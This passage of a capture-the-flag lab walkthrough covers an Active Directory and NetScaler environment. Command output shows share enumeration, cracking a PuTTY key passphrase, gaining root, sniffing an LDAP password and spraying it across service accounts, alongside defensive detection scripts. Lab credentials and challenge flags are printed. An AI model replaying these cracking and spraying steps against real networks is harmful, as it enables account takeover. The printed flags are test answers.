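    {"time": "2023-04-25T18:40:03", "TargetUserName": "pmorgan@HTB.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "172.16.249.205"},
    {"time": "2023-04-25T19:05:30", "TargetUserName": "jmendes@HTB.LOCAL", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "172.16.249.203"},
]


def parse_krb5tgs_header(h):
    """Pull account, realm, SPN and etype out of a john/hashcat krb5tgs line."""
    m = HASH_HEADER_RE.match(h)
    if m is None:
        raise ValueError("not a krb5tgs hash")
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["cipher"] = ETYPE_NAMES.get(d["etype"], "unknown")
    return d


def rc4_service_ticket_requests(events):
    """Inventory: TGS requests that used RC4 for a non-machine, non-krbtgt service account."""
    out = []
    for e in events:
        svc = e["ServiceName"]
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        out.append(e)
    return out


def kerberoast_suspects(events, window_seconds=60, min_distinct_services=3):
    """Flag requesters that pull RC4 tickets for several distinct service accounts in a short window."""
    by_requester = defaultdict(list)
    for e in rc4_service_ticket_requests(events):
        by_requester[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    suspects = []
    for requester, reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= timedelta(seconds=window_seconds)}
            if len(in_window) >= min_distinct_services:
                suspects.append({"requester": requester, "services": sorted(in_window),
                                 "first_seen": t0.isoformat()})
                break
    return suspects


if __name__ == "__main__":
    print(parse_krb5tgs_header(SAMPLE_HASH))
    for s in kerberoast_suspects(EVENTS):
        print("possible kerberoasting by %(requester)s at %(first_seen)s: %(services)s" % s)
```

The inventory function is the quieter signal: any RC4 service ticket for a user account is a reason to move that account to AES-only (msDS-SupportedEncryptionTypes) and to a long random password or a gMSA, after which a captured ticket no longer cracks with a wordlist and rules the way this one did.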

With crackmapexec, using mturner's credentials, we can enumerate the shares on the machines; on Citrix we have read permission on Citrix$

❯ crackmapexec smb 172.16.249.200-205 -u mturner -p 4install! --shares
SMB         172.16.249.205  445    VDESKTOP3        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:VDESKTOP3) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         172.16.249.201  445    CITRIX           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CITRIX) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         172.16.249.205  445    VDESKTOP3        [+] htb.local\mturner:4install! 
SMB         172.16.249.201  445    CITRIX           [+] htb.local\mturner:4install! 
SMB         172.16.249.200  445    DC               [+] htb.local\mturner:4install! 
SMB         172.16.249.205  445    VDESKTOP3        [+] Enumerated shares
SMB         172.16.249.205  445    VDESKTOP3        Share           Permissions     Remark
SMB         172.16.249.205  445    VDESKTOP3        -----           -----------     ------
SMB         172.16.249.205  445    VDESKTOP3        ADMIN$                          Remote Admin
SMB         172.16.249.205  445    VDESKTOP3        C$                              Default share
SMB         172.16.249.205  445    VDESKTOP3        IPC$                            Remote IPC
SMB         172.16.249.201  445    CITRIX           [+] Enumerated shares
SMB         172.16.249.201  445    CITRIX           Share           Permissions     Remark
SMB         172.16.249.201  445    CITRIX           -----           -----------     ------
SMB         172.16.249.201  445    CITRIX           ADMIN$                          Remote Admin
SMB         172.16.249.201  445    CITRIX           C$                              Default share
SMB         172.16.249.201  445    CITRIX           Citrix$         READ            
SMB         172.16.249.201  445    CITRIX           IPC$                            Remote IPC
SMB         172.16.249.201  445    CITRIX           ISOs                            
SMB         172.16.249.201  445    CITRIX           ISOs-TEST
SMB         172.16.249.200  445    DC               [+] Enumerated shares
SMB         172.16.249.200  445    DC               Share           Permissions     Remark
SMB         172.16.249.200  445    DC               -----           -----------     ------
SMB         172.16.249.200  445    DC               ADMIN$                          Remote Admin
SMB         172.16.249.200  445    DC               C$                              Default share
SMB         172.16.249.200  445    DC               IPC$            READ            Remote IPC
SMB         172.16.249.200  445    DC               NETLOGON        READ            Logon server share 
SMB         172.16.249.200  445    DC               SYSVOL          READ            Logon server share

With impacket's smbclient we connect to the Citrix$ share, where we can see several files: 2 pdf files, 1 ppk file and flag.txt

❯ impacket-smbclient htb.local/mturner:'4install!'@172.16.249.201  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Citrix$
# ls
drw-rw-rw-          0  Wed May  8 18:12:51 2019 .
drw-rw-rw-          0  Wed May  8 18:12:51 2019 ..
-rw-rw-rw-     997001  Wed Feb 13 18:33:28 2019 Deploying-XenServer-5.6.pdf
-rw-rw-rw-         20  Sun Mar 31 11:25:29 2019 flag.txt
-rw-rw-rw-       1486  Wed May  8 18:22:10 2019 private.ppk
-rw-rw-rw-    1747587  Sun Mar 31 11:25:46 2019 XenServer-5-6-SHG.pdf
#

We download all the files using get; now we exit and can read the flag

# mget *
[*] Downloading Deploying-XenServer-5.6.pdf
[*] Downloading flag.txt
[*] Downloading private.ppk
[*] Downloading XenServer-5-6-SHG.pdf
# exit

❯ cat flag.txt
XEN{l364cy_5pn5_ftw}


Camouflage

XEN{bu7_ld4p5_15_4_h455l3}


From before we knew there was a Linux machine at .202; scanning its ports with nmap we find an ssh service and an http service

❯ nmap -sT -T5 -n -Pn 172.16.249.202  
Nmap scan report for 172.16.249.202
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3011/tcp open  trusted-web

We have valid credentials; in this case the ones for mturner that we found earlier work for the ssh login, although it doesn't give us a shell

❯ ssh mturner@172.16.249.202
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

(mturner@172.16.249.202) Password: 4install!
Last login: Sun Apr 16 01:39:17 2023 from 172.16.249.204
 Done
>

Reading the NetScaler documentation a bit we see there is a shell command that would give us a console, but mturner is not authorized

> shell
ERROR: Not authorized to execute this command [shell]
>

Let's go back to the files we downloaded; we have one called private.ppk

❯ cat private.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: aes256-cbc
Comment: imported-openssh-key
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQDR1rakYMB+9++bNXo/Rda/7dhII8lzQt+n
ixND2S30rtBz+ROW/UqKqTX8lRZ3zlMFKQT514RomVq0ec6gEoKVGZQRsc+S4aaL
AAnLp4ENGT3Gk9AeHgDxJ2eyBFnzMmO07gInwFzEPCLTT7caJAYGuMFdxgAsU6BX
Y49Tv578krpGNz0C58V6YH+u8/AIVXfhmXdwGuY921NDUHogjRGsoxQi9jDffOx+
zOuxfm7nMRYGDWLZO5HNjhanQt0rj9EK+70zJcFb1CDub9EEmwb/DDZB5zCytx90
69mql7SFg7D0K1tm0LicrwZMDJuYf87P5MFdBEnsO3Oay1lsRFZz
Private-Lines: 14
LbxnKlBkUZLxSGo2vSU375iM6kDpQuIE8S5G+azqGT0FziA/lr40gyj2IipKZqe/
DZRbPNcrerJQDE9xg1qTqnKShjnRvUi+I5ClTvn7UrYt2HAfds/Tl61zRhJ3YXnu
dkw3fTfo63OvBPwRpYQtpj5yFbHtUR8wY+2RBNcS/plU2kretGTRbZJkV9+1U7Vz
Uk2JZfua5VkTuCw7DqKRoAjR28p1UKhpIoztG6MKtNtR1HeUL3y2oQbOzLNJhz0m
F9sn/wBTdPQN5ZB76ERlH0fAugi7YeuxwFxctnUNoeA3+APH3kzeP9uRLsBwdn0r
ayZr/yihzFMlQ7VgcjI9uE2sMnScaEk094FWuj6gjPZqoqzAWhXP/71VEWbOg+gj
s6nBhJB9f4mUEHy8SOlbIK/Q3Es/VAaYiQchSXEsPhHdGC2J511TudjggmCFsCVP
tf6mzyS+8SA23dE8L3V5S5/Y8IDEcvLWaxDsV6Xjd4PGBgMLp10FJYajo9m61GdB
4ffBBqI5sOZK0Gb27AemRSyo0vA5EoM3YUOeKqm5xlNIalrTHI10SKD9tTC8UPLJ
1fbbmJ+eQagw/PefzHQ9cavnU5x98+PjeougVBbkZBGBAqUP0cLV1hWKaOlkqHP5
+m+fLhviWCbNj2FNEFse04NNlbSBgHrF//fVQbFIbSnMsJ/BkDZ5rVxpHG8aq9my
l9a0d97470iNp8drQKuKGRlzbe/TA8NQQaO5/My28kPbLqLcaTJKNZe8rvvU4Cj4
n+76s8XHhONvtAUrULiGHyAM2aMQXwUM5rCju7t6hdpy5h8HTgdys35MRM2DdvtD
+SfIoAmXu1V1xQrQJbDlStVM9l5z6C+pzmtv26jXebl8821pI6xJJHW02dZDAskl  
Private-MAC: 27a161c329fc67b51d27efcaf3221099748934a9
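
The file above is a PuTTY PPK version 2 key. As an added example (not part of the original writeup), the following Python script parses that header format the way a key-hygiene review would: it decodes the public key blob to learn the key type and modulus size, checks whether the private part is encrypted, and flags v2 files, whose passphrase KDF is SHA-1 based (john reports it as `SHA1/AES` above) rather than the Argon2 KDF of PPK v3. The header, the six Public-Lines and the Private-MAC are copied from private.ppk above; the Private-Lines are a constructed placeholder, since nothing here decrypts them.

```python
import base64
import struct

# Sample PPK v2 file. Header, Public-Lines and Private-MAC are the ones from
# the private.ppk shown in the writeup; the encrypted Private-Lines are a
# constructed two-line placeholder because this checker never decrypts them.
SAMPLE_PPK = """\
PuTTY-User-Key-File-2: ssh-rsa
Encryption: aes256-cbc
Comment: imported-openssh-key
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQDR1rakYMB+9++bNXo/Rda/7dhII8lzQt+n
ixND2S30rtBz+ROW/UqKqTX8lRZ3zlMFKQT514RomVq0ec6gEoKVGZQRsc+S4aaL
AAnLp4ENGT3Gk9AeHgDxJ2eyBFnzMmO07gInwFzEPCLTT7caJAYGuMFdxgAsU6BX
Y49Tv578krpGNz0C58V6YH+u8/AIVXfhmXdwGuY921NDUHogjRGsoxQi9jDffOx+
zOuxfm7nMRYGDWLZO5HNjhanQt0rj9EK+70zJcFb1CDub9EEmwb/DDZB5zCytx90
69mql7SFg7D0K1tm0LicrwZMDJuYf87P5MFdBEnsO3Oay1lsRFZz
Private-Lines: 2
Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIsIG5vdCBhIHJlYWwga2V5IGJsb2I=
Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIsIG5vdCBhIHJlYWwga2V5IGJsb2I=
Private-MAC: 27a161c329fc67b51d27efcaf3221099748934a9
"""


def _ssh_string(blob, off):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (length,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    return blob[off:off + length], off + length


def parse_ppk(text):
    """Parse the PPK headers and decode the public blob; returns a dict of facts."""
    lines = text.splitlines()
    fields = {}
    i = 0
    while i < len(lines):
        key, sep, value = lines[i].partition(": ")
        if not sep:
            raise ValueError("malformed PPK line: %r" % lines[i])
        if key in ("Public-Lines", "Private-Lines"):
            count = int(value)                     # N base64 lines follow
            fields[key] = "".join(lines[i + 1:i + 1 + count])
            i += 1 + count
        else:
            fields[key] = value
            i += 1
    version_key = next(k for k in fields if k.startswith("PuTTY-User-Key-File-"))
    cipher = fields.get("Encryption", "none")
    info = {
        "version": int(version_key.rsplit("-", 1)[1]),
        "type": fields[version_key],
        "cipher": cipher,
        "encrypted": cipher != "none",
        "comment": fields.get("Comment", ""),
        "mac": fields.get("Private-MAC"),
    }
    blob = base64.b64decode(fields["Public-Lines"])
    ktype, off = _ssh_string(blob, 0)
    if ktype != info["type"].encode():
        raise ValueError("public blob type does not match the header")
    if ktype == b"ssh-rsa":                        # blob = string "ssh-rsa", mpint e, mpint n
        e_bytes, off = _ssh_string(blob, off)
        n_bytes, off = _ssh_string(blob, off)
        info["e"] = int.from_bytes(e_bytes, "big")
        info["bits"] = int.from_bytes(n_bytes, "big").bit_length()
    return info


def audit_ppk(text):
    """Findings a key-hygiene review would raise for this file (list of strings)."""
    info = parse_ppk(text)
    findings = []
    if not info["encrypted"]:
        findings.append("private key is stored unencrypted (Encryption: none)")
    if info["version"] < 3:
        findings.append("PPK v%d uses a SHA-1 based passphrase KDF; re-save it as "
                        "PPK v3 (Argon2) with a current PuTTY" % info["version"])
    if info["type"] == "ssh-rsa" and info["bits"] < 2048:
        findings.append("RSA modulus is only %d bits" % info["bits"])
    return findings


if __name__ == "__main__":
    print(parse_ppk(SAMPLE_PPK))
    for finding in audit_ppk(SAMPLE_PPK):
        print("-", finding)
```

Even with the passphrase intact, the file still tells a reviewer that the key is a 2048-bit RSA key in the old v2 container; the weak link exploited later in this writeup is the passphrase itself, which no file-level check can see.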

With puttygen we should in theory be able to convert it into an OpenSSH RSA private key, but doing so asks for a passphrase, since the PuTTY key is encrypted

❯ puttygen private.ppk -O private-openssh -o private.key  
Enter passphrase to load key:
puttygen: error loading `private.ppk': wrong passphrase

To get the passphrase we generate a john hash with putty2john, but trying to crack it with rockyou.txt gets us nowhere

❯ putty2john private.ppk > hash

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PuTTY, Private Key (RSA/DSA/ECDSA/ED25519) [SHA1/AES 32/64])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Session completed.

We can use kwprocessor to build a wordlist based on keyboard maps and key-path patterns, in this case using the US English layout

❯ ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > passwords.txt  

Brute-forcing with the wordlist generated by kwprocessor, john cracks the PuTTY key hash and we get the passphrase in clear text

❯ john -w:passwords.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PuTTY, Private Key (RSA/DSA/ECDSA/ED25519) [SHA1/AES 32/64])  
Press 'q' or Ctrl-C to abort, almost any other key for status
=-09876567890-=- (private)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
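
The cracked passphrase is a pure keyboard walk along the top row, which is exactly why a small keymap-derived wordlist beat it where rockyou.txt failed. As an added example (not part of the original writeup), here is the check a password-policy filter would apply to reject such passphrases before they are set: it maps every character to its physical position on a US-English QWERTY keyboard (shifted characters fold onto the same key) and rejects any password in which every consecutive pair of keys touches. The keyboard layout table is my own simplification of the layout and is an assumption.

```python
# US-English QWERTY, unshifted rows; SHIFTED holds the same keys with Shift.
# Rows are staggered: the key at index i of a lower row sits between indexes
# i+OFFSETS[r] and i+OFFSETS[r]+1 of the row above (assumed layout geometry).
ROWS = ["`1234567890-=", "qwertyuiop[]\\", "asdfghjkl;'", "zxcvbnm,./"]
SHIFTED = ["~!@#$%^&*()_+", "QWERTYUIOP{}|", "ASDFGHJKL:\"", "ZXCVBNM<>?"]
OFFSETS = [0, 1, 0, 0]


def _positions():
    """Map every printable key (shifted or not) to its (row, index) on the keyboard."""
    pos = {}
    for r, (row, shifted) in enumerate(zip(ROWS, SHIFTED)):
        for i, (plain, shift) in enumerate(zip(row, shifted)):
            pos[plain] = (r, i)
            pos[shift] = (r, i)
    return pos


POS = _positions()


def adjacent(a, b):
    """True if a and b are the same key or physically neighbouring keys."""
    if a not in POS or b not in POS:
        return False
    (ra, ia), (rb, ib) = POS[a], POS[b]
    if ra == rb:
        return abs(ia - ib) <= 1
    if abs(ra - rb) != 1:
        return False
    if ra > rb:                       # normalise so (ra, ia) is the upper row
        (ra, ia), (rb, ib) = (rb, ib), (ra, ia)
    return ia in (ib + OFFSETS[rb], ib + OFFSETS[rb] + 1)


def is_keyboard_walk(password, min_len=6):
    """True if the whole password is one path of touching keys (any direction changes)."""
    if len(password) < min_len:
        return False
    return all(adjacent(a, b) for a, b in zip(password, password[1:]))


def check_passphrase(password):
    """Policy verdict: a list of reasons to reject, empty when the passphrase passes."""
    reasons = []
    if len(password) < 12:
        reasons.append("shorter than 12 characters")
    if is_keyboard_walk(password):
        reasons.append("keyboard walk (every key touches the previous one)")
    return reasons


if __name__ == "__main__":
    for candidate in ("=-09876567890-=-", "qwertyuiop", "4install!"):
        print(candidate, check_passphrase(candidate) or "ok")
```

The check deliberately ignores direction changes: kwprocessor's route file above already allows up to three, and a longer walk with more turns is no harder for a keymap-based wordlist to enumerate.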

Now with puttygen we can export the ssh-rsa key and save it as private.key; however, it is still an encrypted key and will ask for the passphrase

❯ puttygen private.ppk -O private-openssh -o private.key  
Enter passphrase to load key: =-09876567890-=-

❯ cat private.key 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,BDD46DBFD4AD749C
[...]
5GDqSjIziT5tWesljwyAs4KoZNRgakrbD5jJAk97+UoBxR/+kdfyNA==
-----END RSA PRIVATE KEY-----

We can fix this easily by writing a new key with openssl: we save it as id_rsa, enter the passphrase, and end up with a normal unencrypted key

❯ openssl rsa -in private.key > id_rsa
Enter pass phrase for private.key: =-09876567890-=-  
writing RSA key

❯ cat id_rsa    
-----BEGIN PRIVATE KEY-----
[...]
jh0vjD4+lmnAXWJ5kRpHa40=
-----END PRIVATE KEY-----

One idea is that the private RSA key belongs to the root user and would let us connect without a password, but trying it does not work

❯ ssh root@172.16.249.202 -i id_rsa
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

(root@172.16.249.202) Password:

Reading more NetScaler documentation we find that the privileged user is not root but nsroot; we connect over ssh with the key and can now use shell

❯ ssh nsroot@172.16.249.202 -i id_rsa
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

Last login: Tue Apr 25 17:13:15 2023 from 172.16.249.205
 Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
        The Regents of the University of California. All rights reserved.

root@netscaler:~# id
uid=0(root) gid=0(wheel) groups=0(wheel),20(operator)
root@netscaler:~#

We are root. With tcpdump we can capture some traffic, excluding port 22 since that is our own ssh session and is of little use here

root@netscaler:~# tcpdump -i 1 -w capture.pcap -s 0 'not port 22'
tcpdump: listening on 0/1, link-type EN10MB (Ethernet), capture size 65535 bytes  
^C
5843 packets captured
5979 packets received by filter
0 packets dropped by kernel
root@netscaler:~#

Taking advantage of the ssh connection we can use scp to download the capture file and analyze all the requests locally on our machine

❯ scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################  

capture.pcap                                      100%  678KB 569.4KB/s   00:01

Opening the capture in Wireshark and filtering for http traffic we find the first request to /login/do, which sends the flag as the password
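
What Wireshark shows here is a credential crossing the wire in clear text over plain HTTP, which is something a network sensor can flag automatically. As an added example (not the author's tooling), the following Python builds a small capture in the classic libpcap format entirely in memory and then walks it the way a detection script would: it parses the pcap record headers, the Ethernet, IPv4 and TCP headers, and reports every HTTP request to port 80 whose form body or query string carries a password-like field, logging the field name and user but never the secret itself. The frames, the password value and the hostname are constructed; the IP addresses reuse the ones from this lab.

```python
import struct
from urllib.parse import parse_qs

SENSITIVE = ("password", "passwd", "pass", "pwd")


def _ipv4(text):
    return bytes(int(part) for part in text.split("."))


def build_packet(src, dst, sport, dport, payload):
    """Ethernet + IPv4 + TCP frame around payload (checksums left at 0; readers ignore them)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     _ipv4(src), _ipv4(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Classic libpcap file: 24-byte global header, then (16-byte record header, frame)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for n, frame in enumerate(frames):
        out += struct.pack("<IIII", 1682440000 + n, 0, len(frame), len(frame)) + frame
    return out


# Constructed capture: one harmless GET, one login POST, one LDAP packet (ignored here).
SAMPLE_CAPTURE = build_pcap([
    build_packet("172.16.249.204", "172.16.249.202", 51000, 80,
                 b"GET /index.html HTTP/1.1\r\nHost: netscaler.example\r\n\r\n"),
    build_packet("172.16.249.204", "172.16.249.202", 51001, 80,
                 b"POST /login/do HTTP/1.1\r\nHost: netscaler.example\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n"
                 b"Content-Length: 47\r\n\r\n"
                 b"username=mturner&password=Constructed-Pa55&ok=1"),
    build_packet("172.16.249.204", "172.16.249.200", 51002, 389, b"\x30\x05\x02\x01\x01\x42\x00"),
])


def find_cleartext_logins(pcap_bytes):
    """One finding per HTTP request to port 80 that carries a password-like field in clear."""
    magic = struct.unpack("<I", pcap_bytes[:4])[0]
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if end is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(end + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")
    findings, off = [], 24
    while off + 16 <= len(pcap_bytes):
        ts_sec, _, incl, _ = struct.unpack(end + "IIII", pcap_bytes[off:off + 16])
        frame = pcap_bytes[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                   # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = frame[14 + ihl:]
        dport = struct.unpack("!H", tcp[2:4])[0]
        payload = tcp[(tcp[12] >> 4) * 4:]
        if dport != 80 or not payload.startswith((b"POST ", b"GET ")):
            continue
        head, _, body = payload.partition(b"\r\n\r\n")
        method, path = head.split(b"\r\n", 1)[0].decode("ascii", "replace").split(" ")[:2]
        query = path.partition("?")[2] if method == "GET" else body.decode("ascii", "replace")
        fields = parse_qs(query)
        hits = sorted(k for k in fields if k.lower() in SENSITIVE)
        if hits:
            findings.append({"time": ts_sec, "src": src, "dst": dst, "port": dport,
                             "request": method + " " + path.partition("?")[0],
                             "fields": hits,          # names only; the value is never logged
                             "user": fields.get("username", fields.get("user", ["?"]))[0]})
    return findings


if __name__ == "__main__":
    for finding in find_cleartext_logins(SAMPLE_CAPTURE):
        print(finding)
```

The same idea applied to the LDAP traffic discussed next would look for simple binds (BindRequest with an octet-string credential) on port 389, the protocol-level equivalent of this HTTP form post.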


Doppelgänger

XEN{y_5h4r3d_p@55w0Rd5?}


Filtering for ldap requests we find one under the OU Service Accounts that performs a bind using the password #S3rvice#@cc

Reusing the mturner credentials we got earlier we dump all the domain users; we see several that end in -svc

❯ crackmapexec smb 172.16.249.200 -u mturner -p 4install! --users
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\mturner:4install!
SMB         172.16.249.200  445    DC               [+] Enumerated domain user(s)
SMB         172.16.249.200  445    DC               htb.local\netscaler-svc                  badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\test-svc                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\backup-svc                     badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\anagy                          badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\cmeller                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\fboucher                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\rdrew                          badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\urquarti                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\rprakash                       badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\app-svc                        badpwdcount: 1 desc:
SMB         172.16.249.200  445    DC               htb.local\mturner                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\mssql-svc                      badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\print-svc                      badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\xenserver-svc                  badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\awardel                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\pmorgan                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\jmendes                        badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\alarsson                       badpwdcount: 0 desc:
SMB         172.16.249.200  445    DC               htb.local\krbtgt                         badpwdcount: 1 desc: 
SMB         172.16.249.200  445    DC               htb.local\Guest                          badpwdcount: 1 desc: 
SMB         172.16.249.200  445    DC               htb.local\Administrator                  badpwdcount: 0 desc:

The password was for service accounts, so we can run a password spray with it against all the users ending in -svc; several of them turn out to be valid

❯ crackmapexec smb 172.16.249.200 -u users.txt -p #S3rvice#@cc --continue-on-success
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\netscaler-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [-] htb.local\test-svc:#S3rvice#@cc STATUS_LOGON_FAILURE
SMB         172.16.249.200  445    DC               [+] htb.local\backup-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [-] htb.local\app-svc:#S3rvice#@cc STATUS_LOGON_FAILURE
SMB         172.16.249.200  445    DC               [+] htb.local\mssql-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [+] htb.local\print-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [+] htb.local\xenserver-svc:#S3rvice#@cc
SMB         172.16.249.200  445    DC               [-] htb.local\:#S3rvice#@cc STATUS_LOGON_FAILURE
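
On the DC, a spray like the one above leaves a distinctive trace: within a few seconds one source address produces network logons (type 3) for many different accounts, most of them failures (event 4625) with a few successes (4624). As an added example (not part of the original writeup), the following Python implements that detection over a constructed export of logon events, one per line in a simplified format I assume here rather than the native Windows XML. A source that touches at least `min_users` distinct accounts inside a sliding window is reported together with the accounts that actually logged in, which are the ones to reset first.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC logon events (simplified one-line format, not real
# Windows event XML): 4625 = failed logon, 4624 = successful logon, type 3 = network.
# The first block mirrors the spray above; the rest is ordinary background noise.
SAMPLE_EVENTS = """\
2023-04-25T17:12:01Z 4624 LogonType=3 User=netscaler-svc Src=172.16.249.204
2023-04-25T17:12:01Z 4625 LogonType=3 User=test-svc Src=172.16.249.204
2023-04-25T17:12:02Z 4624 LogonType=3 User=backup-svc Src=172.16.249.204
2023-04-25T17:12:02Z 4625 LogonType=3 User=app-svc Src=172.16.249.204
2023-04-25T17:12:03Z 4624 LogonType=3 User=mssql-svc Src=172.16.249.204
2023-04-25T17:12:03Z 4624 LogonType=3 User=print-svc Src=172.16.249.204
2023-04-25T17:12:04Z 4624 LogonType=3 User=xenserver-svc Src=172.16.249.204
2023-04-25T17:20:10Z 4625 LogonType=3 User=pmorgan Src=172.16.249.205
2023-04-25T17:20:25Z 4625 LogonType=3 User=pmorgan Src=172.16.249.205
2023-04-25T17:20:41Z 4624 LogonType=3 User=pmorgan Src=172.16.249.205
2023-04-25T17:31:00Z 4624 LogonType=3 User=alarsson Src=172.16.249.201
"""

LINE = re.compile(r"^(\S+) (\d{4}) LogonType=(\d+) User=(\S+) Src=(\S+)$")


def parse_events(text):
    """Turn the one-line export into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, eid, ltype, user, src = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "id": int(eid), "type": int(ltype),
                       "user": user.lower(), "src": src})
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Report each source that tried >= min_users distinct accounts within `window`."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] in (4624, 4625) and e["type"] == 3:
            by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        best, start = None, 0
        for end in range(len(evs)):                  # sliding window over this source's logons
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if best is None or len(users) > len(best[2]):
                best = (start, end, users)
        if best and len(best[2]) >= min_users:
            s, e_, users = best
            hits = {e["user"] for e in evs[s:e_ + 1] if e["id"] == 4624}
            alerts.append({"src": src, "users": sorted(users), "hits": sorted(hits),
                           "first": evs[s]["ts"], "last": evs[e_]["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The three pmorgan failures from .205 are what a user mistyping a password looks like and do not trip the rule, because the count is of distinct accounts per source rather than of failures; a spray that rotates source addresses would need the same grouping keyed on the password attempt timing instead.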

However, if we scan the Domain Controller's ports with nmap, besides the classic smb we can see port 5985 open, which is winrm

❯ nmap -sT -T5 -n -Pn 172.16.249.200  
Nmap scan report for 172.16.249.200
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
